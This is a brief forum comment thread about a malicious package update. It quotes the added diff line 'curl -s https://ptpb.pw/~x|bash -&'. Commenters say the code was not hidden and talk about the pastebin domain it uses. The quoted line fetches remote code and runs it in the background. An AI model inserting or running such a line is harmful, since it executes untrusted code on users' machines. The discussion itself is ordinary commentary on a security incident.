Comment by dmix

8 years ago

> + curl -s https://ptpb.pw/~x|bash -&

So much for being sneaky malware, he wasn't even trying to hide it... Any insertion of a `curl` command to some shady looking TLD piping to bash is going to be a massive red flag to even unsophisticated linux users.

Not much to see here, fortunately.

2 comments

dmix

Reply
0xb100db1ade  8 years ago

that "shady" domain is the official pastebin for freenode's Arch Linux IRC channel

  • earenndil  8 years ago

    Even moreso: the fact that it's well-known as a pastebin means that it should be obvious data coming from it are user-generated and could come from anyone.